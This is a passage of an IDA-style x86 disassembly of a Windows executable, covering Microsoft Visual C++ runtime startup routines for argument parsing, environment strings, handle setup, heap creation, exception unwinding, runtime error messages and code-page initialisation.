loc_403100: ; CODE XREF: sub_402FE1+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_40310E: ; CODE XREF: sub_402FE1+106�j
shr ebx, 1
loc_403110: ; CODE XREF: sub_402FE1+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_403125
inc ebx
loc_403118: ; CODE XREF: sub_402FE1+142�j
test esi, esi
jz short loc_403120
mov byte ptr [esi], 5Ch
inc esi
loc_403120: ; CODE XREF: sub_402FE1+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_403118
loc_403125: ; CODE XREF: sub_402FE1+134�j
mov dl, [eax]
test dl, dl
jz short loc_403175
cmp [ebp+arg_10], 0
jnz short loc_40313B
cmp dl, 20h
jz short loc_403175
cmp dl, 9
jz short loc_403175
loc_40313B: ; CODE XREF: sub_402FE1+14E�j
cmp [ebp+arg_0], 0
jz short loc_40316F
test esi, esi
jz short loc_40315E
movzx ebx, dl
test ds:byte_4073C1[ebx], 4
jz short loc_403157
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403157: ; CODE XREF: sub_402FE1+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40316D
; ---------------------------------------------------------------------------
loc_40315E: ; CODE XREF: sub_402FE1+162�j
movzx edx, dl
test ds:byte_4073C1[edx], 4
jz short loc_40316D
inc eax
inc dword ptr [ecx]
loc_40316D: ; CODE XREF: sub_402FE1+17B�j
; sub_402FE1+187�j
inc dword ptr [ecx]
loc_40316F: ; CODE XREF: sub_402FE1+15E�j
inc eax
jmp loc_4030CD
; ---------------------------------------------------------------------------
loc_403175: ; CODE XREF: sub_402FE1+148�j
; sub_402FE1+153�j ...
test esi, esi
jz short loc_40317D
and byte ptr [esi], 0
inc esi
loc_40317D: ; CODE XREF: sub_402FE1+196�j
inc dword ptr [ecx]
jmp loc_40309B
; ---------------------------------------------------------------------------
loc_403184: ; CODE XREF: sub_402FE1+BD�j
; sub_402FE1+D5�j
test edi, edi
jz short loc_40318B
and dword ptr [edi], 0
loc_40318B: ; CODE XREF: sub_402FE1+1A5�j
mov eax, [ebp+arg_C]
pop edi
pop esi
pop ebx
inc dword ptr [eax]
pop ebp
retn
sub_402FE1 endp
; =============== S U B R O U T I N E =======================================
sub_403195 proc near ; CODE XREF: sub_40292E+7F�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, ds:dword_407230
push ebx
push ebp
mov ebp, ds:dword_4050B8
push esi
push edi
xor ebx, ebx
xor esi, esi
xor edi, edi
cmp eax, ebx
jnz short loc_4031E3
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_4031C4
mov ds:dword_407230, 1
jmp short loc_4031EC
; ---------------------------------------------------------------------------
loc_4031C4: ; CODE XREF: sub_403195+21�j
call ds:dword_4050BC ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz loc_4032BE
mov ds:dword_407230, 2
jmp loc_403272
; ---------------------------------------------------------------------------
loc_4031E3: ; CODE XREF: sub_403195+19�j
cmp eax, 1
jnz loc_40326D
loc_4031EC: ; CODE XREF: sub_403195+2D�j
cmp esi, ebx
jnz short loc_4031FC
call ebp ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz loc_4032BE
loc_4031FC: ; CODE XREF: sub_403195+59�j
cmp [esi], bx
mov eax, esi
jz short loc_403211
loc_403203: ; CODE XREF: sub_403195+73�j
; sub_403195+7A�j
inc eax
inc eax
cmp [eax], bx
jnz short loc_403203
inc eax
inc eax
cmp [eax], bx
jnz short loc_403203
loc_403211: ; CODE XREF: sub_403195+6C�j
sub eax, esi
mov edi, ds:dword_4050C0
sar eax, 1
push ebx
push ebx
inc eax
push ebx
push ebx
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_403262
push ebp
call sub_403DA6
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_403262
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_40325E
push [esp+18h+var_8]
call sub_403D77
pop ecx
mov [esp+18h+var_8], ebx
loc_40325E: ; CODE XREF: sub_403195+B9�j
mov ebx, [esp+18h+var_8]
loc_403262: ; CODE XREF: sub_403195+99�j
; sub_403195+A8�j
push esi
call ds:dword_4050C4 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_4032C0
; ---------------------------------------------------------------------------
loc_40326D: ; CODE XREF: sub_403195+51�j
cmp eax, 2
jnz short loc_4032BE
loc_403272: ; CODE XREF: sub_403195+49�j
cmp edi, ebx
jnz short loc_403282
call ds:dword_4050BC ; GetEnvironmentStrings
mov edi, eax
cmp edi, ebx
jz short loc_4032BE
loc_403282: ; CODE XREF: sub_403195+DF�j
cmp [edi], bl
mov eax, edi
jz short loc_403292
loc_403288: ; CODE XREF: sub_403195+F6�j
; sub_403195+FB�j
inc eax
cmp [eax], bl
jnz short loc_403288
inc eax
cmp [eax], bl
jnz short loc_403288
loc_403292: ; CODE XREF: sub_403195+F1�j
sub eax, edi
inc eax
mov ebp, eax
push ebp
call sub_403DA6
mov esi, eax
pop ecx
cmp esi, ebx
jnz short loc_4032A8
xor esi, esi
jmp short loc_4032B3
; ---------------------------------------------------------------------------
loc_4032A8: ; CODE XREF: sub_403195+10D�j
push ebp
push edi
push esi
call sub_402380
add esp, 0Ch
loc_4032B3: ; CODE XREF: sub_403195+111�j
push edi
call ds:dword_4050E8 ; FreeEnvironmentStringsA
mov eax, esi
jmp short loc_4032C0
; ---------------------------------------------------------------------------
loc_4032BE: ; CODE XREF: sub_403195+39�j
; sub_403195+61�j ...
xor eax, eax
loc_4032C0: ; CODE XREF: sub_403195+D6�j
; sub_403195+127�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_403195 endp
; =============== S U B R O U T I N E =======================================
sub_4032C7 proc near ; CODE XREF: sub_40292E+6F�p
var_44 = byte ptr -44h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
sub esp, 44h
push ebx
push ebp
push esi
push edi
push 100h
call sub_403DA6
mov esi, eax
pop ecx
test esi, esi
jnz short loc_4032E7
push 1Bh
call sub_402A24
pop ecx
loc_4032E7: ; CODE XREF: sub_4032C7+16�j
mov ds:dword_4074E0, esi
mov ds:dword_4075E0, 20h
lea eax, [esi+100h]
loc_4032FD: ; CODE XREF: sub_4032C7+52�j
cmp esi, eax
jnb short loc_40331B
and byte ptr [esi+4], 0
or dword ptr [esi], 0FFFFFFFFh
mov byte ptr [esi+5], 0Ah
mov eax, ds:dword_4074E0
add esi, 8
add eax, 100h
jmp short loc_4032FD
; ---------------------------------------------------------------------------
loc_40331B: ; CODE XREF: sub_4032C7+38�j
lea eax, [esp+54h+var_44]
push eax
call ds:dword_4050CC ; GetStartupInfoA
cmp word ptr [esp+54h+var_14+2], 0
jz loc_4033F7
mov eax, [esp+54h+var_10]
test eax, eax
jz loc_4033F7
mov esi, [eax]
lea ebp, [eax+4]
mov eax, 800h
cmp esi, eax
lea ebx, [esi+ebp]
jl short loc_403351
mov esi, eax
loc_403351: ; CODE XREF: sub_4032C7+86�j
cmp ds:dword_4075E0, esi
jge short loc_4033AB
mov edi, offset dword_4074E4
loc_40335E: ; CODE XREF: sub_4032C7+DA�j
push 100h
call sub_403DA6
test eax, eax
pop ecx
jz short loc_4033A5
add ds:dword_4075E0, 20h
mov [edi], eax
lea ecx, [eax+100h]
loc_40337C: ; CODE XREF: sub_4032C7+CF�j
cmp eax, ecx
jnb short loc_403398
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
mov byte ptr [eax+5], 0Ah
mov ecx, [edi]
add eax, 8
add ecx, 100h
jmp short loc_40337C
; ---------------------------------------------------------------------------
loc_403398: ; CODE XREF: sub_4032C7+B7�j
add edi, 4
cmp ds:dword_4075E0, esi
jl short loc_40335E
jmp short loc_4033AB
; ---------------------------------------------------------------------------
loc_4033A5: ; CODE XREF: sub_4032C7+A4�j
mov esi, ds:dword_4075E0
loc_4033AB: ; CODE XREF: sub_4032C7+90�j
; sub_4032C7+DC�j
xor edi, edi
test esi, esi
jle short loc_4033F7
loc_4033B1: ; CODE XREF: sub_4032C7+12E�j
mov eax, [ebx]
cmp eax, 0FFFFFFFFh
jz short loc_4033EE
mov cl, [ebp+0]
test cl, 1
jz short loc_4033EE
test cl, 8
jnz short loc_4033D0
push eax
call ds:dword_4050A0 ; GetFileType
test eax, eax
jz short loc_4033EE
loc_4033D0: ; CODE XREF: sub_4032C7+FC�j
mov eax, edi
mov ecx, edi
sar eax, 5
and ecx, 1Fh
mov eax, ds:dword_4074E0[eax*4]
lea eax, [eax+ecx*8]
mov ecx, [ebx]
mov [eax], ecx
mov cl, [ebp+0]
mov [eax+4], cl
loc_4033EE: ; CODE XREF: sub_4032C7+EF�j
; sub_4032C7+F7�j ...
inc edi
inc ebp
add ebx, 4
cmp edi, esi
jl short loc_4033B1
loc_4033F7: ; CODE XREF: sub_4032C7+65�j
; sub_4032C7+71�j ...
xor ebx, ebx
loc_4033F9: ; CODE XREF: sub_4032C7+195�j
mov eax, ds:dword_4074E0
cmp dword ptr [eax+ebx*8], 0FFFFFFFFh
lea esi, [eax+ebx*8]
jnz short loc_403454
test ebx, ebx
mov byte ptr [esi+4], 81h
jnz short loc_403414
push 0FFFFFFF6h
pop eax
jmp short loc_40341E
; ---------------------------------------------------------------------------
loc_403414: ; CODE XREF: sub_4032C7+146�j
mov eax, ebx
dec eax
neg eax
sbb eax, eax
add eax, 0FFFFFFF5h
loc_40341E: ; CODE XREF: sub_4032C7+14B�j
push eax
call ds:dword_4050A4 ; GetStdHandle
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_403443
push edi
call ds:dword_4050A0 ; GetFileType
test eax, eax
jz short loc_403443
and eax, 0FFh
mov [esi], edi
cmp eax, 2
jnz short loc_403449
loc_403443: ; CODE XREF: sub_4032C7+163�j
; sub_4032C7+16E�j
or byte ptr [esi+4], 40h
jmp short loc_403458
; ---------------------------------------------------------------------------
loc_403449: ; CODE XREF: sub_4032C7+17A�j
cmp eax, 3
jnz short loc_403458
or byte ptr [esi+4], 8
jmp short loc_403458
; ---------------------------------------------------------------------------
loc_403454: ; CODE XREF: sub_4032C7+13E�j
or byte ptr [esi+4], 80h
loc_403458: ; CODE XREF: sub_4032C7+180�j
; sub_4032C7+185�j ...
inc ebx
cmp ebx, 3
jl short loc_4033F9
push ds:dword_4075E0
call ds:dword_4050A8 ; LockResource
pop edi
pop esi
pop ebp
pop ebx
add esp, 44h
retn
sub_4032C7 endp
; =============== S U B R O U T I N E =======================================
sub_403472 proc near ; CODE XREF: sub_40292E+5A�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call ds:dword_405098 ; HeapCreate
test eax, eax
mov ds:dword_4074C8, eax
jz short loc_4034A7
call sub_403E1A
test eax, eax
jnz short loc_4034AA
push ds:dword_4074C8
call ds:dword_40509C ; HeapDestroy
loc_4034A7: ; CODE XREF: sub_403472+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_4034AA: ; CODE XREF: sub_403472+27�j
push 1
pop eax
retn
sub_403472 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4034B0 proc near ; CODE XREF: sub_4035A8+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_4034C8
push [ebp+arg_0]
call sub_404DA8 ; RtlUnwind
loc_4034C8: ; DATA XREF: sub_4034B0+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4034B0 endp
; =============== S U B R O U T I N E =======================================
sub_4034D0 proc near ; DATA XREF: sub_4034F2+A�o
; .text:00403563�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_4034F1
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_4034F1: ; CODE XREF: sub_4034D0+10�j
retn
sub_4034D0 endp
; =============== S U B R O U T I N E =======================================
sub_4034F2 proc near ; CODE XREF: sub_4035A8+67�p
; sub_4035A8+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_4034D0
push large dword ptr fs:0
mov large fs:0, esp
loc_40350F: ; CODE XREF: sub_4034F2:loc_40354A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_40354C
cmp esi, [esp+1Ch+arg_4]
jz short loc_40354C
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_40354A
push 101h
mov eax, [ebx+esi*4+8]
call sub_403586
call dword ptr [ebx+esi*4+8]
loc_40354A: ; CODE XREF: sub_4034F2+44�j
jmp short loc_40350F
; ---------------------------------------------------------------------------
loc_40354C: ; CODE XREF: sub_4034F2+2A�j
; sub_4034F2+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4034F2 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_4034D0
jnz short locret_40357C
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_40357C
mov eax, 1
locret_40357C: ; CODE XREF: .text:0040356A�j
; .text:00403575�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_406F1C
jmp short loc_403590
; =============== S U B R O U T I N E =======================================
sub_403586 proc near ; CODE XREF: sub_4034F2+4F�p
; sub_4035A8+78�p
push ebx
push ecx
mov ebx, offset dword_406F1C
mov ecx, [ebp+8]
loc_403590: ; CODE XREF: .text:00403584�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_403586 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4035A8 proc near ; DATA XREF: sub_40292E+A�o
; sub_40380C+A�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_403648
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_4035DB: ; CODE XREF: sub_4035A8+90�j
cmp esi, 0FFFFFFFFh
jz short loc_403641
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_40362F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_40362F
js short loc_40363A
mov edi, [ebx+8]
push ebx
call sub_4034B0
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4034F2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_403586
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_40362F: ; CODE XREF: sub_4035A8+40�j
; sub_4035A8+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_4035DB
; ---------------------------------------------------------------------------
loc_40363A: ; CODE XREF: sub_4035A8+54�j
mov eax, 0
jmp short loc_40365D
; ---------------------------------------------------------------------------
loc_403641: ; CODE XREF: sub_4035A8+36�j
mov eax, 1
jmp short loc_40365D
; ---------------------------------------------------------------------------
loc_403648: ; CODE XREF: sub_4035A8+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4034F2
add esp, 8
pop ebp
mov eax, 1
loc_40365D: ; CODE XREF: sub_4035A8+97�j
; sub_4035A8+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4035A8 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4034F2
add esp, 8
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_403680 proc near ; CODE XREF: sub_402A24+9�p
; sub_402A49+9�p
mov eax, ds:dword_4070D8
cmp eax, 1
jz short loc_403697
test eax, eax
jnz short locret_4036B8
cmp ds:dword_406C64, 1
jnz short locret_4036B8
loc_403697: ; CODE XREF: sub_403680+8�j
push 0FCh
call sub_4036B9
mov eax, ds:dword_407234
pop ecx
test eax, eax
jz short loc_4036AD
call eax
loc_4036AD: ; CODE XREF: sub_403680+29�j
push 0FFh
call sub_4036B9
pop ecx
locret_4036B8: ; CODE XREF: sub_403680+C�j
; sub_403680+15�j
retn
sub_403680 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4036B9 proc near ; CODE XREF: sub_402A24+12�p
; sub_402A49+12�p ...
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1A4h
mov edx, [ebp+arg_0]
xor ecx, ecx
mov eax, offset dword_406F30
loc_4036CC: ; CODE XREF: sub_4036B9+20�j
cmp edx, [eax]
jz short loc_4036DB
add eax, 8
inc ecx
cmp eax, offset byte_406FC0
jl short loc_4036CC
loc_4036DB: ; CODE XREF: sub_4036B9+15�j
push esi
mov esi, ecx
shl esi, 3
cmp edx, ds:dword_406F30[esi]
jnz loc_403809
mov eax, ds:dword_4070D8
cmp eax, 1
jz loc_4037E3
test eax, eax
jnz short loc_40370C
cmp ds:dword_406C64, 1
jz loc_4037E3
loc_40370C: ; CODE XREF: sub_4036B9+44�j
cmp edx, 0FCh
jz loc_403809
lea eax, [ebp+var_1A4]
push 104h
push eax
push 0
call ds:dword_405038 ; GetModuleFileNameA
test eax, eax
jnz short loc_403743
lea eax, [ebp+var_1A4]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_402810
pop ecx
pop ecx
loc_403743: ; CODE XREF: sub_4036B9+75�j
lea eax, [ebp+var_1A4]
push edi
push eax
lea edi, [ebp+var_1A4]
call sub_402300
inc eax
pop ecx
cmp eax, 3Ch
jbe short loc_403786
lea eax, [ebp+var_1A4]
push eax
call sub_402300
mov edi, eax
lea eax, [ebp+var_1A4]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_4046F0
add esp, 10h
loc_403786: ; CODE XREF: sub_4036B9+A2�j
lea eax, [ebp+var_A0]
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push eax
call sub_402810
lea eax, [ebp+var_A0]
push edi
push eax
call sub_402820
lea eax, [ebp+var_A0]
push offset asc_40540C ; "\n\n"
push eax
call sub_402820
push ds:off_406F34[esi]
lea eax, [ebp+var_A0]
push eax
call sub_402820
push 12010h
lea eax, [ebp+var_A0]
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push eax
call sub_404663
add esp, 2Ch
pop edi
jmp short loc_403809
; ---------------------------------------------------------------------------
loc_4037E3: ; CODE XREF: sub_4036B9+3C�j
; sub_4036B9+4D�j
lea eax, [ebp+arg_0]
lea esi, off_406F34[esi]
push 0
push eax
push dword ptr [esi]
call sub_402300
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call ds:dword_4050A4 ; GetStdHandle
push eax
call ds:dword_405088 ; WriteFile
loc_403809: ; CODE XREF: sub_4036B9+2E�j
; sub_4036B9+59�j ...
pop esi
leave
retn
sub_4036B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40380C proc near ; CODE XREF: sub_402B3C+5E�p
; sub_403BD6+9A�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405450
push offset sub_4035A8
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_407238
xor ebx, ebx
cmp eax, ebx
jnz short loc_40387B
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_405448
push esi
call ds:dword_40507C ; GetStringTypeW
test eax, eax
jz short loc_403859
mov eax, esi
jmp short loc_403876
; ---------------------------------------------------------------------------
loc_403859: ; CODE XREF: sub_40380C+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_4070C8
push esi
push ebx
call ds:dword_405080 ; GetStringTypeA
test eax, eax
jz loc_403941
push 2
pop eax
loc_403876: ; CODE XREF: sub_40380C+4B�j
mov ds:dword_407238, eax
loc_40387B: ; CODE XREF: sub_40380C+2F�j
cmp eax, 2
jnz short loc_4038A4
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_40388C
mov eax, ds:dword_407254
loc_40388C: ; CODE XREF: sub_40380C+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_405080 ; GetStringTypeA
jmp loc_403943
; ---------------------------------------------------------------------------
loc_4038A4: ; CODE XREF: sub_40380C+72�j
cmp eax, 1
jnz loc_403941
cmp [ebp+arg_10], ebx
jnz short loc_4038BA
mov eax, ds:dword_407264
mov [ebp+arg_10], eax
loc_4038BA: ; CODE XREF: sub_40380C+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_405084 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_403941
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_4026C0
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_4022A0
add esp, 0Ch
jmp short loc_403910
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_403910: ; CODE XREF: sub_40380C+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_403941
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_405084 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_403941
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_40507C ; GetStringTypeW
jmp short loc_403943
; ---------------------------------------------------------------------------
loc_403941: ; CODE XREF: sub_40380C+61�j
; sub_40380C+9B�j ...
xor eax, eax
loc_403943: ; CODE XREF: sub_40380C+93�j
; sub_40380C+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40380C endp
; =============== S U B R O U T I N E =======================================
sub_403955 proc near ; CODE XREF: sub_402E37+2B�p
arg_0 = dword ptr 4
push 4
push 0
push [esp+8+arg_0]
call sub_403966
add esp, 0Ch
retn
sub_403955 endp
; =============== S U B R O U T I N E =======================================
sub_403966 proc near ; CODE XREF: sub_403955+8�p
arg_0 = byte ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
movzx eax, [esp+arg_0]
mov cl, [esp+arg_8]
test ds:byte_4073C1[eax], cl
jnz short loc_403993
cmp [esp+arg_4], 0
jz short loc_40398C
movzx eax, ds:word_406C7A[eax*2]
and eax, [esp+arg_4]
jmp short loc_40398E
; ---------------------------------------------------------------------------
loc_40398C: ; CODE XREF: sub_403966+16�j
xor eax, eax
loc_40398E: ; CODE XREF: sub_403966+24�j
test eax, eax
jnz short loc_403993
retn
; ---------------------------------------------------------------------------
loc_403993: ; CODE XREF: sub_403966+F�j
; sub_403966+2A�j
push 1
pop eax
retn
sub_403966 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_403997 proc near ; CODE XREF: sub_403D5B+B�p
var_18 = dword ptr -18h
var_12 = byte ptr -12h
var_11 = byte ptr -11h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 18h
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_403B30 ; GetOEMCP
mov esi, eax
pop ecx
cmp esi, ds:dword_407290
mov [ebp+arg_0], esi
jz loc_403B24
xor ebx, ebx
cmp esi, ebx
jz loc_403B1A
xor edx, edx
mov eax, offset dword_406FC8
loc_4039CB: ; CODE XREF: sub_403997+41�j
cmp [eax], esi
jz short loc_403A41
add eax, 30h
inc edx
cmp eax, offset dword_4070B8
jl short loc_4039CB
lea eax, [ebp+var_18]
push eax
push esi
call ds:dword_405078 ; GetCPInfo
cmp eax, 1
jnz loc_403B12
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4073C0
cmp [ebp+var_18], 1
mov ds:dword_407290, esi
rep stosd
stosb
mov ds:dword_4074C4, ebx
jbe loc_403B00
cmp [ebp+var_12], 0
jz loc_403AD6
lea ecx, [ebp+var_11]
loc_403A1E: ; CODE XREF: sub_403997+139�j
mov dl, [ecx]
test dl, dl
jz loc_403AD6
movzx eax, byte ptr [ecx-1]
movzx edx, dl
loc_403A2F: ; CODE XREF: sub_403997+A8�j
cmp eax, edx
ja loc_403ACA
or ds:byte_4073C1[eax], 4
inc eax
jmp short loc_403A2F
; ---------------------------------------------------------------------------
loc_403A41: ; CODE XREF: sub_403997+36�j
push 40h
xor eax, eax
pop ecx
mov edi, offset byte_4073C0
rep stosd
lea esi, [edx+edx*2]
mov [ebp+var_4], ebx
shl esi, 4
stosb
lea ebx, dword_406FD8[esi]
loc_403A5D: ; CODE XREF: sub_403997+103�j
cmp byte ptr [ebx], 0
mov ecx, ebx
jz short loc_403A90
loc_403A64: ; CODE XREF: sub_403997+F7�j
mov dl, [ecx+1]
test dl, dl
jz short loc_403A90
movzx eax, byte ptr [ecx]
movzx edi, dl
cmp eax, edi
ja short loc_403A89
mov edx, [ebp+var_4]
mov dl, ds:byte_406FC0[edx]
loc_403A7E: ; CODE XREF: sub_403997+F0�j
or ds:byte_4073C1[eax], dl
inc eax
cmp eax, edi
jbe short loc_403A7E
loc_403A89: ; CODE XREF: sub_403997+DC�j
inc ecx
inc ecx
cmp byte ptr [ecx], 0
jnz short loc_403A64
loc_403A90: ; CODE XREF: sub_403997+CB�j
; sub_403997+D2�j
inc [ebp+var_4]
add ebx, 8
cmp [ebp+var_4], 4
jb short loc_403A5D
mov eax, [ebp+arg_0]
mov ds:dword_4072AC, 1
push eax
mov ds:dword_407290, eax
call sub_403B7A
lea esi, dword_406FCC[esi]
mov edi, offset dword_4072A0
movsd
movsd
pop ecx
mov ds:dword_4074C4, eax
movsd
jmp short loc_403B1F
; ---------------------------------------------------------------------------
loc_403ACA: ; CODE XREF: sub_403997+9A�j
inc ecx
inc ecx
cmp byte ptr [ecx-1], 0
jnz loc_403A1E
loc_403AD6: ; CODE XREF: sub_403997+7E�j
; sub_403997+8B�j
push 1
pop eax
loc_403AD9: ; CODE XREF: sub_403997+14F�j
or ds:byte_4073C1[eax], 8
inc eax
cmp eax, 0FFh
jb short loc_403AD9
push esi
call sub_403B7A
pop ecx
mov ds:dword_4074C4, eax
mov ds:dword_4072AC, 1
jmp short loc_403B06
; ---------------------------------------------------------------------------
loc_403B00: ; CODE XREF: sub_403997+74�j
mov ds:dword_4072AC, ebx
loc_403B06: ; CODE XREF: sub_403997+167�j
xor eax, eax
mov edi, offset dword_4072A0
stosd
stosd
stosd
jmp short loc_403B1F
; ---------------------------------------------------------------------------
loc_403B12: ; CODE XREF: sub_403997+51�j
cmp ds:dword_40723C, ebx
jz short loc_403B28
loc_403B1A: ; CODE XREF: sub_403997+27�j
call sub_403BAD
loc_403B1F: ; CODE XREF: sub_403997+131�j
; sub_403997+179�j
call sub_403BD6
loc_403B24: ; CODE XREF: sub_403997+1D�j
xor eax, eax
jmp short loc_403B2B
; ---------------------------------------------------------------------------
loc_403B28: ; CODE XREF: sub_403997+181�j
or eax, 0FFFFFFFFh
loc_403B2B: ; CODE XREF: sub_403997+18F�j
pop edi
pop esi
pop ebx
leave
retn
sub_403997 endp
; =============== S U B R O U T I N E =======================================
sub_403B30 proc near ; CODE XREF: sub_403997+C�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
and ds:dword_40723C, 0
cmp eax, 0FFFFFFFEh
jnz short loc_403B50
